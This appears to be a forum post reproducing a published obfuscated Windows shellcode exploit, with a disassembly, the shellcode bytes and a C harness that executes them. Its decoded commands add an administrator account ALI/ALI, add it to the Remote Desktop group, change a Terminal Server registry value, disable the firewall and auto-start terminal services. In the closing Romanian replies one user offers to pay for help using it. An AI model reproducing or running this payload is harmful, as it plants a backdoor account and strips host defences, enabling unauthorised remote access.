Obfuscated Shellcode Windows x64 - [1218 Bytes] Add Administrator User/Pass

[Kalashnikov.]

#Author: Ali Razmjoo

? ?#Title: ?Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]

Obfuscated Shellcode Windows x64 [1218 Bytes].c

/*

#Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]

#length: 1218 bytes

#Date: 13 January 2015

#Author: Ali Razmjoo

#tested On: Windows 7 x64 ultimate

WinExec => 0x769e2c91

ExitProcess => 0x769679f8

====================================

Execute :

net user ALI ALI /add

net localgroup Administrators ALI /add

NET LOCALGROUP "Remote Desktop Users" ALI /add

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

netsh firewall set opmode disable

sc config termservice start= auto

====================================

Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']

Thanks to my friends , Dariush Nasirpour and Ehsan Nezami

C:\Users\Ali\Desktop>objdump -D shellcode.o

shellcode.o: file format elf32-i386

Disassembly of section .text:

00000000 <.text>:

0: 31 c0 xor %eax,%eax

2: 50 push %eax

3: b8 41 41 41 64 mov $0x64414141,%eax

8: c1 e8 08 shr $0x8,%eax

b: c1 e8 08 shr $0x8,%eax

e: c1 e8 08 shr $0x8,%eax

11: 50 push %eax

12: b9 6d 76 53 52 mov $0x5253766d,%ecx

17: ba 4d 59 32 36 mov $0x3632594d,%edx

1c: 31 d1 xor %edx,%ecx

1e: 51 push %ecx

1f: b9 6e 72 61 71 mov $0x7161726e,%ecx

24: ba 4e 33 2d 38 mov $0x382d334e,%edx

29: 31 d1 xor %edx,%ecx

2b: 51 push %ecx

2c: b9 6c 75 78 78 mov $0x7878756c,%ecx

31: ba 4c 34 34 31 mov $0x3134344c,%edx

36: 31 d1 xor %edx,%ecx

38: 51 push %ecx

39: b9 46 47 57 46 mov $0x46574746,%ecx

3e: ba 33 34 32 34 mov $0x34323433,%edx

43: 31 d1 xor %edx,%ecx

45: 51 push %ecx

46: b9 56 50 47 64 mov $0x64475056,%ecx

4b: ba 38 35 33 44 mov $0x44333538,%edx

50: 31 d1 xor %edx,%ecx

52: 51 push %ecx

53: 89 e0 mov %esp,%eax

55: bb 41 41 41 01 mov $0x1414141,%ebx

5a: c1 eb 08 shr $0x8,%ebx

5d: c1 eb 08 shr $0x8,%ebx

60: c1 eb 08 shr $0x8,%ebx

63: 53 push %ebx

64: 50 push %eax

65: bb dc 7a a8 23 mov $0x23a87adc,%ebx

6a: ba 4d 56 36 55 mov $0x5536564d,%edx

6f: 31 d3 xor %edx,%ebx

71: ff d3 call *%ebx

73: 31 c0 xor %eax,%eax

75: 50 push %eax

76: 68 41 41 64 64 push $0x64644141

7b: 58 pop %eax

7c: c1 e8 08 shr $0x8,%eax

7f: c1 e8 08 shr $0x8,%eax

82: 50 push %eax

83: b9 01 41 60 32 mov $0x32604101,%ecx

88: ba 48 61 4f 53 mov $0x534f6148,%edx

8d: 31 d1 xor %edx,%ecx

8f: 51 push %ecx

90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx

95: ba 5b 67 4c 63 mov $0x634c675b,%edx

9a: 31 d1 xor %edx,%ecx

9c: 51 push %ecx

9d: b9 03 24 36 21 mov $0x21362403,%ecx

a2: ba 62 50 59 53 mov $0x53595062,%edx

a7: 31 d1 xor %edx,%ecx

a9: 51 push %ecx

aa: b9 34 41 15 18 mov $0x18154134,%ecx

af: ba 5d 32 61 6a mov $0x6a61325d,%edx

b4: 31 d1 xor %edx,%ecx

b6: 51 push %ecx

b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx

bc: ba 68 68 72 4b mov $0x4b726868,%edx

c1: 31 d1 xor %edx,%ecx

c3: 51 push %ecx

c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx

c9: ba 5a 57 5b 52 mov $0x525b575a,%edx

ce: 31 d1 xor %edx,%ecx

d0: 51 push %ecx

d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx

d6: ba 70 4b 70 51 mov $0x51704b70,%edx

db: 31 d1 xor %edx,%ecx

dd: 51 push %ecx

de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx

e3: ba 51 45 51 2d mov $0x2d514551,%edx

e8: 31 d1 xor %edx,%ecx

ea: 51 push %ecx

eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx

f0: ba 4d 39 68 39 mov $0x3968394d,%edx

f5: 31 d1 xor %edx,%ecx

f7: 51 push %ecx

f8: 89 e0 mov %esp,%eax

fa: bb 41 41 41 01 mov $0x1414141,%ebx

ff: c1 eb 08 shr $0x8,%ebx

102: c1 eb 08 shr $0x8,%ebx

105: c1 eb 08 shr $0x8,%ebx

108: 53 push %ebx

109: 50 push %eax

10a: bb dc 7a a8 23 mov $0x23a87adc,%ebx

10f: ba 4d 56 36 55 mov $0x5536564d,%edx

114: 31 d3 xor %edx,%ebx

116: ff d3 call *%ebx

118: 31 c0 xor %eax,%eax

11a: 50 push %eax

11b: 68 41 41 64 64 push $0x64644141

120: 58 pop %eax

121: c1 e8 08 shr $0x8,%eax

124: c1 e8 08 shr $0x8,%eax

127: 50 push %eax

128: b9 02 63 6b 35 mov $0x356b6302,%ecx

12d: ba 4b 43 44 54 mov $0x5444434b,%edx

132: 31 d1 xor %edx,%ecx

134: 51 push %ecx

135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx

13a: ba 43 75 2d 71 mov $0x712d7543,%edx

13f: 31 d1 xor %edx,%ecx

141: 51 push %ecx

142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx

147: ba 54 5a 49 69 mov $0x69495a54,%edx

14c: 31 d1 xor %edx,%ecx

14e: 51 push %ecx

14f: b9 25 34 12 67 mov $0x67123425,%ecx

154: ba 4a 44 32 32 mov $0x3232444a,%edx

159: 31 d1 xor %edx,%ecx

15b: 51 push %ecx

15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx

161: ba 6e 71 74 6d mov $0x6d74716e,%edx

166: 31 d1 xor %edx,%ecx

168: 51 push %ecx

169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx

16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx

173: 31 d1 xor %edx,%ecx

175: 51 push %ecx

176: b9 35 15 03 2a mov $0x2a031535,%ecx

17b: ba 67 70 6e 45 mov $0x456e7067,%edx

180: 31 d1 xor %edx,%ecx

182: 51 push %ecx

183: b9 3a 17 75 46 mov $0x4675173a,%ecx

188: ba 6f 47 55 64 mov $0x6455476f,%edx

18d: 31 d1 xor %edx,%ecx

18f: 51 push %ecx

190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx

195: ba 6a 72 59 51 mov $0x5159726a,%edx

19a: 31 d1 xor %edx,%ecx

19c: 51 push %ecx

19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx

1a2: ba 66 65 45 6b mov $0x6b456566,%edx

1a7: 31 d1 xor %edx,%ecx

1a9: 51 push %ecx

1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx

1af: ba 53 65 61 7a mov $0x7a616553,%edx

1b4: 31 d1 xor %edx,%ecx

1b6: 51 push %ecx

1b7: 89 e0 mov %esp,%eax

1b9: bb 41 41 41 01 mov $0x1414141,%ebx

1be: c1 eb 08 shr $0x8,%ebx

1c1: c1 eb 08 shr $0x8,%ebx

1c4: c1 eb 08 shr $0x8,%ebx

1c7: 53 push %ebx

1c8: 50 push %eax

1c9: bb dc 7a a8 23 mov $0x23a87adc,%ebx

1ce: ba 4d 56 36 55 mov $0x5536564d,%edx

1d3: 31 d3 xor %edx,%ebx

1d5: ff d3 call *%ebx

1d7: 31 c0 xor %eax,%eax

1d9: 50 push %eax

1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx

1df: ba 38 6c 53 38 mov $0x38536c38,%edx

1e4: 31 d1 xor %edx,%ecx

1e6: 51 push %ecx

1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx

1ec: ba 62 62 5d 34 mov $0x345d6262,%edx

1f1: 31 d1 xor %edx,%ecx

1f3: 51 push %ecx

1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx

1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx

1fe: 31 d1 xor %edx,%ecx

200: 51 push %ecx

201: b9 1d 30 15 28 mov $0x2815301d,%ecx

206: ba 58 77 4a 6c mov $0x6c4a7758,%edx

20b: 31 d1 xor %edx,%ecx

20d: 51 push %ecx

20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx

213: ba 53 5b 77 44 mov $0x44775b53,%edx

218: 31 d1 xor %edx,%ecx

21a: 51 push %ecx

21b: b9 42 25 2a 66 mov $0x662a2542,%ecx

220: ba 2d 4b 59 46 mov $0x46594b2d,%edx

225: 31 d1 xor %edx,%ecx

227: 51 push %ecx

228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx

22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx

232: 31 d1 xor %edx,%ecx

234: 51 push %ecx

235: b9 20 2b 26 26 mov $0x26262b20,%ecx

23a: ba 63 44 48 48 mov $0x48484463,%edx

23f: 31 d1 xor %edx,%ecx

241: 51 push %ecx

242: b9 08 2b 23 67 mov $0x67232b08,%ecx

247: ba 66 52 77 34 mov $0x34775266,%edx

24c: 31 d1 xor %edx,%ecx

24e: 51 push %ecx

24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx

254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx

259: 31 d1 xor %edx,%ecx

25b: 51 push %ecx

25c: b9 67 67 1d 37 mov $0x371d6767,%ecx

261: ba 45 47 32 41 mov $0x41324745,%edx

266: 31 d1 xor %edx,%ecx

268: 51 push %ecx

269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx

26e: ba 71 45 68 49 mov $0x49684571,%edx

273: 31 d1 xor %edx,%ecx

275: 51 push %ecx

276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx

27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx

280: 31 d1 xor %edx,%ecx

282: 51 push %ecx

283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx

288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx

28d: 31 d1 xor %edx,%ecx

28f: 51 push %ecx

290: b9 34 23 23 3b mov $0x3b232334,%ecx

295: ba 68 77 46 49 mov $0x49467768,%edx

29a: 31 d1 xor %edx,%ecx

29c: 51 push %ecx

29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx

2a2: ba 73 48 65 78 mov $0x78654873,%edx

2a7: 31 d1 xor %edx,%ecx

2a9: 51 push %ecx

2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx

2af: ba 48 6d 37 3d mov $0x3d376d48,%edx

2b4: 31 d1 xor %edx,%ecx

2b6: 51 push %ecx

2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx

2bc: ba 52 6e 43 46 mov $0x46436e52,%edx

2c1: 31 d1 xor %edx,%ecx

2c3: 51 push %ecx

2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx

2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx

2ce: 31 d1 xor %edx,%ecx

2d0: 51 push %ecx

2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx

2d6: ba 58 7a 44 44 mov $0x44447a58,%edx

2db: 31 d1 xor %edx,%ecx

2dd: 51 push %ecx

2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx

2e3: ba 49 62 78 52 mov $0x52786249,%edx

2e8: 31 d1 xor %edx,%ecx

2ea: 51 push %ecx

2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx

2f0: ba 61 31 67 75 mov $0x75673161,%edx

2f5: 31 d1 xor %edx,%ecx

2f7: 51 push %ecx

2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx

2fd: ba 62 64 68 73 mov $0x73686462,%edx

302: 31 d1 xor %edx,%ecx

304: 51 push %ecx

305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx

30a: ba 36 33 78 69 mov $0x69783336,%edx

30f: 31 d1 xor %edx,%ecx

311: 51 push %ecx

312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx

317: ba 31 52 4c 67 mov $0x674c5231,%edx

31c: 31 d1 xor %edx,%ecx

31e: 51 push %ecx

31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx

324: ba 58 49 79 72 mov $0x72794958,%edx

329: 31 d1 xor %edx,%ecx

32b: 51 push %ecx

32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx

331: ba 2d 65 52 6e mov $0x6e52652d,%edx

336: 31 d1 xor %edx,%ecx

338: 51 push %ecx

339: b9 16 10 1f 17 mov $0x171f1016,%ecx

33e: ba 34 58 54 52 mov $0x52545834,%edx

343: 31 d1 xor %edx,%ecx

345: 51 push %ecx

346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx

34b: ba 4e 43 68 4e mov $0x4e68434e,%edx

350: 31 d1 xor %edx,%ecx

352: 51 push %ecx

353: b9 39 22 5e 50 mov $0x505e2239,%ecx

358: ba 4b 47 39 70 mov $0x7039474b,%edx

35d: 31 d1 xor %edx,%ecx

35f: 51 push %ecx

360: 89 e0 mov %esp,%eax

362: bb 41 41 41 01 mov $0x1414141,%ebx

367: c1 eb 08 shr $0x8,%ebx

36a: c1 eb 08 shr $0x8,%ebx

36d: c1 eb 08 shr $0x8,%ebx

370: 53 push %ebx

371: 50 push %eax

372: bb dc 7a a8 23 mov $0x23a87adc,%ebx

377: ba 4d 56 36 55 mov $0x5536564d,%edx

37c: 31 d3 xor %edx,%ebx

37e: ff d3 call *%ebx

380: 31 c0 xor %eax,%eax

382: 50 push %eax

383: b8 41 41 41 65 mov $0x65414141,%eax

388: c1 e8 08 shr $0x8,%eax

38b: c1 e8 08 shr $0x8,%eax

38e: c1 e8 08 shr $0x8,%eax

391: 50 push %eax

392: b9 1e 53 39 3c mov $0x3c39531e,%ecx

397: ba 6d 32 5b 50 mov $0x505b326d,%edx

39c: 31 d1 xor %edx,%ecx

39e: 51 push %ecx

39f: b9 04 66 2f 32 mov $0x322f6604,%ecx

3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx

3a9: 31 d1 xor %edx,%ecx

3ab: 51 push %ecx

3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx

3b1: ba 69 73 62 75 mov $0x75627369,%edx

3b6: 31 d1 xor %edx,%ecx

3b8: 51 push %ecx

3b9: b9 20 41 47 36 mov $0x36474120,%ecx

3be: ba 45 35 67 59 mov $0x59673545,%edx

3c3: 31 d1 xor %edx,%ecx

3c5: 51 push %ecx

3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx

3cb: ba 47 69 44 59 mov $0x59446947,%edx

3d0: 31 d1 xor %edx,%ecx

3d2: 51 push %ecx

3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx

3d8: ba 62 5a 38 43 mov $0x43385a62,%edx

3dd: 31 d1 xor %edx,%ecx

3df: 51 push %ecx

3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx

3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx

3ea: 31 d1 xor %edx,%ecx

3ec: 51 push %ecx

3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx

3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx

3f7: 31 d1 xor %edx,%ecx

3f9: 51 push %ecx

3fa: 89 e0 mov %esp,%eax

3fc: bb 41 41 41 01 mov $0x1414141,%ebx

401: c1 eb 08 shr $0x8,%ebx

404: c1 eb 08 shr $0x8,%ebx

407: c1 eb 08 shr $0x8,%ebx

40a: 53 push %ebx

40b: 50 push %eax

40c: bb dc 7a a8 23 mov $0x23a87adc,%ebx

411: ba 4d 56 36 55 mov $0x5536564d,%edx

416: 31 d3 xor %edx,%ebx

418: ff d3 call *%ebx

41a: 31 c0 xor %eax,%eax

41c: 50 push %eax

41d: b8 41 41 41 6f mov $0x6f414141,%eax

422: c1 e8 08 shr $0x8,%eax

425: c1 e8 08 shr $0x8,%eax

428: c1 e8 08 shr $0x8,%eax

42b: 50 push %eax

42c: b9 72 2a 05 39 mov $0x39052a72,%ecx

431: ba 52 4b 70 4d mov $0x4d704b52,%edx

436: 31 d1 xor %edx,%ecx

438: 51 push %ecx

439: b9 54 3a 05 52 mov $0x52053a54,%ecx

43e: ba 35 48 71 6f mov $0x6f714835,%edx

443: 31 d1 xor %edx,%ecx

445: 51 push %ecx

446: b9 29 16 0a 47 mov $0x470a1629,%ecx

44b: ba 4c 36 79 33 mov $0x3379364c,%edx

450: 31 d1 xor %edx,%ecx

452: 51 push %ecx

453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx

458: ba 55 6d 32 5d mov $0x5d326d55,%edx

45d: 31 d1 xor %edx,%ecx

45f: 51 push %ecx

460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx

465: ba 41 77 48 75 mov $0x75487741,%edx

46a: 31 d1 xor %edx,%ecx

46c: 51 push %ecx

46d: b9 34 79 3a 12 mov $0x123a7934,%ecx

472: ba 53 59 4e 77 mov $0x774e5953,%edx

477: 31 d1 xor %edx,%ecx

479: 51 push %ecx

47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx

47f: ba 72 32 78 41 mov $0x41783272,%edx

484: 31 d1 xor %edx,%ecx

486: 51 push %ecx

487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx

48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx

491: 31 d1 xor %edx,%ecx

493: 51 push %ecx

494: 89 e0 mov %esp,%eax

496: bb 41 41 41 01 mov $0x1414141,%ebx

49b: c1 eb 08 shr $0x8,%ebx

49e: c1 eb 08 shr $0x8,%ebx

4a1: c1 eb 08 shr $0x8,%ebx

4a4: 53 push %ebx

4a5: 50 push %eax

4a6: bb dc 7a a8 23 mov $0x23a87adc,%ebx

4ab: ba 4d 56 36 55 mov $0x5536564d,%edx

4b0: 31 d3 xor %edx,%ebx

4b2: ff d3 call *%ebx

4b4: bb 9b 4f d0 30 mov $0x30d04f9b,%ebx

4b9: ba 63 36 46 46 mov $0x46463663,%edx

4be: 31 d3 xor %edx,%ebx

4c0: ff d3 call *%ebx

*/

#include <stdio.h>

#include <string.h>

int main(){

unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\xbb\x9b\x4f\xd0\x30\xba\x63\x36\x46\x46\x31\xd3\xff\xd3";

fprintf(stdout,"Length: %d\n\n",strlen(shellcode));

(*(void(*)()) shellcode)();

}

[PKK]

cine stie cum folosesc asta? platesc

[Nytro]

Il folosesti intr-un exploit.

[PKK]

cum ?